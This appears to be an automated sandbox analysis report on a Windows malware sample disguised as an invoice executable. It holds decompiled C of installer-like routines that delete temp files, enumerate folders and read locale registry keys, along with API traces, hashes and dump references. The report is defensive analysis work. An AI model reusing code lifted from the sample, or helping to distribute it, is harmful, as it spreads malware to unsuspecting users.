0x00000000
0x72ab1f44
0x72ab1f44
0x72ab1f46
0x00000000
0x00000000
0x72ab1f75
0x72ab1f75
0x00000000
0x00000000
0x72ab1f4f
0x72ab1f4f
0x00000000
0x00000000
0x72ab1f9b
0x72ab1f9f
0x72ab1fa4
0x72ab1fa7
0x00000000
0x00000000
0x72ab1f59
0x72ab1f59
0x72ab1f5c
0x72ab1f5e
0x00000000
0x00000000
0x72ab1f6e
0x72ab1f6e
0x72ab1f77
0x72ab1f77
0x72ab1e5a
0x72ab1e5a
0x72ab1e5d
0x72ab1e64
0x72ab1e66
0x72ab1e68
0x72ab1e6f
0x72ab1e72
0x72ab1e77
0x72ab1e79
0x72ab1e7b
0x72ab1e7f
0x72ab1e85
0x72ab1e8b
0x72ab1e8b
0x72ab1e8d
0x72ab1e8d
0x72ab1e8e
0x72ab1e8e
0x72ab1e92
0x72ab1e98
0x72ab1e9a
0x72ab1e9e
0x72ab1ea3
0x72ab1ea3
0x72ab1ea5
0x72ab1ea5
0x72ab1ea8
0x72ab1eab
0x72ab1eb4
0x72ab1eb7
0x72ab1eba
0x72ab1eba
0x72ab1ebc
0x72ab1ebf
0x72ab1ec5
0x72ab1ecb
0x72ab1ecb
0x72ab1ecd
0x00000000
0x00000000
0x72ab1ed3
0x72ab1ed3
0x72ab1ed7
0x72ab1ede
0x72ab1f02
0x72ab1f02
0x72ab1f06
0x72ab1f08
0x72ab1f0b
0x72ab1f0b
0x72ab1f0e
0x72ab1f0e
0x00000000
0x72ab1f06
0x72ab1ee3
0x72ab1ee6
0x72ab1ee6
0x72ab1eed
0x72ab1eef
0x72ab1ef2
0x72ab1ef9
0x72ab1efa
0x72ab1f00
0x72ab1f00
0x00000000
0x72ab1f00
0x72ab1ef4
0x72ab1ef7
0x00000000
0x00000000
0x00000000
0x72ab1ef7
0x72ab1e87
0x72ab1e89
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x72ab1df5
0x72ab1c9b
0x72ab1c9b
0x72ab1c9c
0x72ab1ddb
0x00000000
0x72ab1ddb
0x72ab1ca2
0x72ab1ca3
0x00000000
0x00000000
0x72ab1ca9
0x72ab1cac
0x72ab1da0
0x72ab1da0
0x72ab1da3
0x72ab1db8
0x72ab1dba
0x72ab1dba
0x72ab1dbb
0x72ab1dbe
0x72ab1dc1
0x72ab1dcd
0x72ab1dcd
0x72ab1dcd
0x72ab1dc3
0x72ab1dc3
0x72ab1dc3
0x72ab1dd3
0x00000000
0x72ab1dd3
0x72ab1da5
0x72ab1da5
0x72ab1da6
0x72ab1db4
0x00000000
0x72ab1db4
0x72ab1da9
0x72ab1daa
0x00000000
0x00000000
0x72ab1db0
0x00000000
0x72ab1db0
0x72ab1cb2
0x72ab1d9c
0x00000000
0x72ab1d9c
0x72ab1cb8
0x72ab1cb8
0x72ab1cbb
0x72ab1ce4
0x00000000
0x72ab1ce4
0x72ab1cbd
0x72ab1cbd
0x72ab1cc0
0x72ab1cda
0x00000000
0x72ab1cda
0x72ab1cc2
0x72ab1cc2
0x72ab1cc5
0x72ab1cd4
0x00000000
0x72ab1cd4
0x72ab1cc8
0x72ab1cc9
0x00000000
0x00000000
0x72ab1ccb
0x00000000
0x72ab1b83
0x72ab1b83
0x72ab1b86
0x00000000
0x72ab1b86
0x72ab1b7d
0x72ab1b6b
0x72ab1b6f
0x00000000
0x00000000
0x72ab1b71
0x72ab1b74
0x00000000
0x00000000
0x00000000
0x72ab1b74
0x72ab1b05
0x72ab1b08
0x72ab1b3e
0x72ab1b41
0x00000000
0x72ab1b47
0x72ab1b49
0x72ab1b4d
0x72ab1b54
0x72ab1b5b
0x72ab1b5e
0x72ab1b61
0x00000000
0x72ab1b61
0x72ab1b41
0x72ab1b0a
0x72ab1b0b
0x72ab1b26
0x72ab1b29
0x00000000
0x72ab1b2f
0x72ab1b2f
0x72ab1b36
0x72ab1b39
0x00000000
0x72ab1b39
0x72ab1b29
0x72ab1b10
0x00000000
0x72ab1b16
0x72ab1b16
0x72ab1b1d
0x00000000
0x72ab1b1d
0x72ab1b10
0x72ab1d09
0x72ab1d0e
0x72ab1d13
0x72ab1d17
0x72ab21c6
0x72ab21cc
0x72ab1d29
0x72ab1d2b
0x72ab1d2c
0x72ab20f1
0x72ab20f1
0x72ab20f4
0x72ab20f7
0x72ab2114
0x72ab211a
0x72ab211c
0x72ab2122
0x72ab2139
0x72ab2139
0x72ab2139
0x72ab2146
0x72ab214c
0x72ab214f
0x72ab2155
0x72ab2157
0x72ab215a
0x72ab215c
0x72ab2163
0x72ab2168
0x72ab216b
0x72ab216d
0x72ab2172
0x72ab2184
0x72ab2184
0x72ab2172
0x72ab216b
0x72ab215a
0x72ab218a
0x72ab218d
0x72ab2197
0x72ab219f
0x72ab21ab
0x72ab21b1
0x72ab21b4
0x72ab20e6
0x72ab20e6
0x00000000
0x72ab20e6
0x72ab21ba
0x72ab21c0
0x72ab21c0
0x00000000
0x00000000
0x72ab21c2
0x72ab21c2
0x72ab21c2
0x72ab21c2
0x00000000
0x72ab218f
0x72ab218f
0x72ab2195
0x00000000
0x00000000
0x00000000
0x72ab2195
0x72ab218d
0x72ab2125
0x72ab212b
0x72ab212d
0x72ab2133
0x00000000
0x00000000
0x00000000
0x72ab2133
0x72ab20f9
0x72ab2100
0x72ab2106
0x72ab210c
0x00000000
0x72ab210c
0x72ab1d32
0x72ab1d33
0x72ab20d0
0x72ab20d0
0x72ab20d6
0x72ab20d9
0x00000000
0x00000000
0x72ab20e0
0x72ab20e5
0x00000000
0x72ab20e5
0x72ab1d3a
0x00000000
0x00000000
0x72ab1d40
0x72ab1d40
0x72ab1d49
0x72ab1d4e
0x72ab1d54
0x00000000
0x00000000
0x72ab1d5a
0x72ab1d67
0x72ab1d6d
0x72ab1d77
0x72ab1d7d
0x72ab1d85
0x72ab1d95
0x00000000
0x72ab1d95

APIs

Part of subcall function 72AB1215: GlobalAlloc.KERNEL32(00000040,72AB1233,?,72AB12CF,-72AB404B,72AB11AB,-000000A0), ref: 72AB121D

GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 72AB1BC4
lstrcpyA.KERNEL32(00000008,?), ref: 72AB1C0C
lstrcpyA.KERNEL32(00000408,?), ref: 72AB1C16
GlobalFree.KERNEL32 ref: 72AB1C29
GlobalFree.KERNEL32 ref: 72AB1D09
GlobalFree.KERNEL32 ref: 72AB1D0E
GlobalFree.KERNEL32 ref: 72AB1D13
GlobalFree.KERNEL32 ref: 72AB1EFA
lstrcpyA.KERNEL32(?,?), ref: 72AB2098
GetModuleHandleA.KERNELBASE(00000008), ref: 72AB2114
LoadLibraryA.KERNELBASE(00000008), ref: 72AB2125
GetProcAddress.KERNEL32(?,?), ref: 72AB217E
lstrlenA.KERNEL32(00000408), ref: 72AB2198

Memory Dump Source

Source File: 00000000.00000002.688800351.0000000072AB1000.00000020.00020000.sdmp, Offset: 72AB0000, based on PE: true

Associated: 00000000.00000002.688792553.0000000072AB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.688807982.0000000072AB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.688815540.0000000072AB5000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: d7217c196c38e042e81e34db26df840ab26120019aba83ee4b84b34b0154c62a
Instruction ID: 3c635702332e9ff0b68cb8b190aabb7369e31858fbc5af8ab08f97b663e10427
Opcode Fuzzy Hash: d7217c196c38e042e81e34db26df840ab26120019aba83ee4b84b34b0154c62a
Instruction Fuzzy Hash: 6E22AD71D00249DFDB118FACC9847AEBBFAFF09305F10552ED196A6198D7785A82CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0040589C, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040589C(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405B5A(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x7a3008 =  *0x7a3008 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E004060D4(0x7a0570, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405AB3(_t73);
					} else {
						lstrcatA(0x7a0570, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x7a0570,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405A97( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E004060D4(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E00405854(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E004051FB(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x7a3008 =  *0x7a3008 + 1;
										} else {
											E004051FB(0xfffffff1, _t73);
											E00405EB3(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040589C(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x7a0570 - 0x5c;
					if( *0x7a0570 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E00406448(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405A6C(_t73);
							_t40 = E00405854(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E004051FB(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E004051FB(0xfffffff1, _t73);
							return E00405EB3(_t72, _t73, 0);
						}
						L33:
						 *0x7a3008 =  *0x7a3008 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x004058a6
0x004058ab
0x004058b4
0x004058b7
0x004058bf
0x004058c2
0x004058c5
0x004058cd
0x004058cf
0x004058d0
0x00000000
0x004058d0
0x004058db
0x004058de
0x004058de
0x004058de
0x004058e2
0x004058f5
0x004058fc
0x00405901
0x00405905
0x00405915
0x00405907
0x0040590d
0x0040590d
0x0040591a
0x0040591d
0x00405928
0x0040592e
0x00405933
0x00405943
0x00405945
0x0040594b
0x0040594e
0x00405951
0x00405a09
0x00405a09
0x00405a0d
0x00405a0f
0x00405a0f
0x00405a0f
0x00405a0f
0x00000000
0x00000000
0x00000000
0x00000000
0x00405957
0x00405957
0x00405960
0x00405966
0x0040596b
0x0040596e
0x00405970
0x00405974
0x00405976
0x00405976
0x00405974
0x00405979
0x0040597c
0x0040598f
0x00405991
0x00405996
0x0040599d
0x004059b8
0x004059bd
0x004059bf
0x004059e3
0x004059c1
0x004059c1
0x004059c4
0x004059d8
0x004059c6
0x004059c9
0x004059d1
0x004059d1
0x004059c4
0x0040599f
0x004059a5
0x004059a7
0x004059ad
0x004059ad
0x004059a7
0x00000000
0x0040599d
0x0040597e
0x00405981
0x00405983
0x00000000
0x00000000
0x00405985
0x00405987
0x00000000
0x00000000
0x00405989
0x0040598d
0x00000000
0x00000000
0x00000000
0x004059e8
0x004059f2
0x004059f8
0x004059f8
0x00405a03
0x00000000
0x00405a03
0x0040591f
0x00405926
0x00000000
0x00000000
0x00000000
0x004058e4
0x004058e4
0x004058e6
0x00405a13
0x00405a15
0x00405a18
0x00405a69
0x00405a69
0x00405a69
0x00405a1a
0x00405a1d
0x00405a28
0x00405a2d
0x00405a2f
0x00000000
0x00000000
0x00405a32
0x00405a3e
0x00405a43
0x00405a45
0x00000000
0x00405a60
0x00405a47
0x00405a4a
0x00000000
0x00000000
0x00405a4f
0x00000000
0x00405a56
0x00405a1f
0x00405a1f
0x00000000
0x00405a1f
0x004058ec
0x004058ef
0x00000000
0x00000000
0x00000000
0x004058ef

APIs

DeleteFileA.KERNELBASE(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058C5
lstrcatA.KERNEL32(007A0570,\*.*,007A0570,?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040590D
lstrcatA.KERNEL32(?,0040A014,?,007A0570,?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040592E
lstrlenA.KERNEL32(?,?,0040A014,?,007A0570,?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405934
FindFirstFileA.KERNEL32(007A0570,?,?,?,0040A014,?,007A0570,?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405945
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004059F2
FindClose.KERNEL32(00000000), ref: 00405A03

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004058A9
\*.*, xrefs: 00405907
"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" , xrefs: 0040589C

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3064614985
Opcode ID: 01fb9e0cb0f04803ffd17b8b81141bc26167464e8ccb864bcb1501931c73c8a8
Instruction ID: ff286dc4e0ddd5c67b21a0dc49aadedac0e09a5b28e8edd6ac2018649726c89b
Opcode Fuzzy Hash: 01fb9e0cb0f04803ffd17b8b81141bc26167464e8ccb864bcb1501931c73c8a8
Instruction Fuzzy Hash: 9C51B071900A04AADF21AB65CC86BBF7B68DF46724F14823BF441B51D2C73C4A82DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00406448, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406448(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x7a0db8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7a0db8;
			}

0x00406453
0x0040645c
0x00000000
0x00406469
0x0040645f
0x00000000

APIs

FindFirstFileA.KERNELBASE(73BCFA90,007A0DB8,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,00405B9D,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,73BCFA90,C:\Users\user\AppData\Local\Temp\), ref: 00406453
FindClose.KERNEL32(00000000), ref: 0040645F

Strings

C:\Users\user\AppData\Local\Temp\nsb112C.tmp, xrefs: 00406448

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsb112C.tmp
API String ID: 2295610775-995190758
Opcode ID: e2f3e8573fc2909bb7a973f29d8235fa37fadc60103d57d1e27243d25dce126e
Instruction ID: 7d3207d9493d68405b9bf293567bde81a359e03289c7d5d361232287f2b34f21
Opcode Fuzzy Hash: e2f3e8573fc2909bb7a973f29d8235fa37fadc60103d57d1e27243d25dce126e
Instruction Fuzzy Hash: B7D01235504620ABC3405B78AD0C88B7A589F563313218F36F46AF12E0C6748C638ADD

Uniqueness

Uniqueness Score: -1.00%

Function 004038E7, Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E004038E7(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x7a2f74;
				_t17 = E004064DD(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x79f568;
					"1033" = 0x30;
					 *0x7aa001 = 0x78;
					 *0x7aa002 = 0;
					E00405FBB(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79f568, 0);
					__eflags =  *0x79f568;
					if(__eflags == 0) {
						E00405FBB(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x79f568, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E00406032("1033",  *_t17() & 0x0000ffff);
				}
				E00403BAC(_t71, _t84);
				_t80 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x7a3000 =  *0x7a2f7c & 0x00000020;
				 *0x7a301c = 0x10000;
				if(E00405B5A(_t84, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405B5A(_t92, _t80) == 0) {
						E00406167(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x7a2f60, 0x67, 1, 0, 0, 0x8040);
					 *0x7a2748 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403BAC(_t71, __eflags);
							__eflags =  *0x7a3020;
							if( *0x7a3020 != 0) {
								_t28 = E004052CD(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7a272c;
								if( *0x7a272c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x79f548, 5); // executed
							_t34 = E0040646F("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E0040646F("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x7a2700);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x7a2700);
								 *0x7a2724 = _t81;
								RegisterClassA(0x7a2700);
							}
							_t39 = DialogBoxParamA( *0x7a2f60,  *0x7a2740 + 0x00000069 & 0x0000ffff, 0, E00403C84, 0); // executed
							E00403837(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x7a2f60;
						 *0x7a2704 = E00401000;
						 *0x7a2710 =  *0x7a2f60;
						 *0x7a2714 = _t25;
						 *0x7a2724 = 0x40a1f4;
						if(RegisterClassA(0x7a2700) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x79f548 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2f60, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x7a1f00;
					E00405FBB(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x7a2fb8, 0x7a1f00, 0);
					_t57 =  *0x7a1f00; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x7a1f01;
						 *((char*)(E00405A97(0x7a1f01, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E004060D4(_t80, E00405A6C(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405AB3(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x004038ed
0x004038f6
0x004038fd
0x004038ff
0x00403913
0x00403925
0x0040392c
0x00403933
0x00403939
0x0040393e
0x00403944
0x00403957
0x00403957
0x00403962
0x00403901
0x0040390c
0x0040390c
0x00403967
0x00403971
0x0040397a
0x0040397f
0x00403990
0x00403a17
0x00403a1f
0x00403a28
0x00403a28
0x00403a3e
0x00403a44
0x00403a52
0x00403ad3
0x00403adb
0x00403ae5
0x00403aea
0x00403af0
0x00403b7a
0x00403b7f
0x00403b81
0x00403b9d
0x00000000
0x00403b9d
0x00403b83
0x00403b89
0x00403b91
0x00403b91
0x00000000
0x00403b89
0x00403afe
0x00403b09
0x00403b0e
0x00403b10
0x00403b17
0x00403b17
0x00403b22
0x00403b2a
0x00403b2c
0x00403b2e
0x00403b37
0x00403b3a
0x00403b40
0x00403b40
0x00403b5f
0x00403b70
0x00000000
0x00403b75
0x00403add
0x00403adf
0x00000000
0x00403a54
0x00403a54
0x00403a60
0x00403a6a
0x00403a70
0x00403a75
0x00403a84
0x00403ba2
0x00403ba2
0x00000000
0x00403ba2
0x00403a93
0x00403ace
0x00000000
0x00403ace
0x00403996
0x00403996
0x00403999
0x0040399b
0x00000000
0x00000000
0x004039a5
0x004039b5
0x004039ba
0x004039c1
0x00000000
0x00000000
0x004039c5
0x004039c7
0x004039d4
0x004039d4
0x004039dc
0x004039e2
0x00403a0a
0x00403a12
0x00000000
0x004039f4
0x004039f5
0x004039fe
0x00403a04
0x00403a05
0x00000000
0x00403a05
0x00403a00
0x00403a02
0x00000000
0x00000000
0x00000000
0x00403a02
0x004039e2

APIs

Part of subcall function 004064DD: GetModuleHandleA.KERNEL32(?,?,?,00403398,0000000B), ref: 004064EF
Part of subcall function 004064DD: GetProcAddress.KERNEL32(00000000,?), ref: 0040650A

lstrcatA.KERNEL32(1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000,00000002,73BCFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" ,00000000), ref: 00403962
lstrlenA.KERNEL32(007A1F00,?,?,?,007A1F00,00000000,C:\Users\user\AppData\Local\Temp,1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000,00000002,73BCFA90), ref: 004039D7
lstrcmpiA.KERNEL32(?,.exe,007A1F00,?,?,?,007A1F00,00000000,C:\Users\user\AppData\Local\Temp,1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000), ref: 004039EA
GetFileAttributesA.KERNEL32(007A1F00), ref: 004039F5
LoadImageA.USER32 ref: 00403A3E

Part of subcall function 00406032: wsprintfA.USER32 ref: 0040603F

RegisterClassA.USER32 ref: 00403A7B
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A93
CreateWindowExA.USER32 ref: 00403AC8
ShowWindow.USER32(00000005,00000000), ref: 00403AFE
GetClassInfoA.USER32 ref: 00403B2A
GetClassInfoA.USER32 ref: 00403B37
RegisterClassA.USER32 ref: 00403B40
DialogBoxParamA.USER32 ref: 00403B5F

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00403971, 00403979, 00403A11, 00403A17, 00403A27
.exe, xrefs: 004039E4
1033, xrefs: 00403907, 0040395D
.DEFAULT\Control Panel\International, xrefs: 0040394D
RichEdit20A, xrefs: 00403B22, 00403B28
C:\Users\user\AppData\Local\Temp\, xrefs: 004038EC
RichEd20, xrefs: 00403B04
RichEd32, xrefs: 00403B12
Control Panel\Desktop\ResourceLocale, xrefs: 0040391B
"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" , xrefs: 004038EB
RichEdit, xrefs: 00403B31
_Nb, xrefs: 00403A5A, 00403AC2

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-479183508
Opcode ID: 324f55f2a5ac8f7c305ccad0dc84d9ef32b78b46d1c0d1fac3a0d30b78cf5155
Instruction ID: f7990f1d18b0f5a23d57c8cfe7c70d4d4c73fa70df7bf6ac8ad2bf3217d0cd4d
Opcode Fuzzy Hash: 324f55f2a5ac8f7c305ccad0dc84d9ef32b78b46d1c0d1fac3a0d30b78cf5155
Instruction Fuzzy Hash: 29619570640640AEE610AF659D45F3B3E6CEB8574AF10413EF981B62E3DB7D9D028B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA1, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

